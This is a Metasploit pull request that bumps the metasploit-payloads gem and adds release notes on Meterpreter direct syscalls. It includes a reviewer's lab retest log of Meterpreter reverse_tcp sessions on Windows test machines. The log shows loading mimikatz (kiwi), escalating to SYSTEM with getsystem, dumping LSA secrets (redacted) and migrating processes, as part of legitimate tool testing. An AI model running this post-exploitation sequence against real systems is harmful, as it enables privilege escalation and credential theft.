
Update metasploit-payloads gem to 2.0.165 #18737

Merged
merged 1 commit into from
Jan 25, 2024

Conversation

zeroSteiner
Contributor

@zeroSteiner zeroSteiner force-pushed the fix/bump-payloads/2.0.165 branch from 1d1b268 to 7dc4116 Compare January 23, 2024 15:32
@zeroSteiner zeroSteiner force-pushed the fix/bump-payloads/2.0.165 branch from 7dc4116 to dd3d1a9 Compare January 23, 2024 15:42
@cdelafuente-r7 cdelafuente-r7 self-assigned this Jan 24, 2024
@cdelafuente-r7
Contributor

Thanks @zeroSteiner, I did a quick retest to make sure the payloads generated by automation are working as expected.

  • output using an x64 Meterpreter payload against Win11 x64 (loading extension, migrating to an x86 process, etc.)
msf6 payload(cmd/windows/powershell/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-26CQRHP\n00tmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 3408
[*] Migrating from 2292 to 3408...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

  • output using an x86 Meterpreter payload against Win7 x86 (loading extension, etc.)
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN7-DEV
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN7-DEV\nutmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 480
[*] Migrating from 2452 to 480...
[*] Migration completed successfully.
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Jan 25, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit 44bf686 into rapid7:master Jan 25, 2024
58 checks passed
@cdelafuente-r7
Contributor

Release Notes

This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.
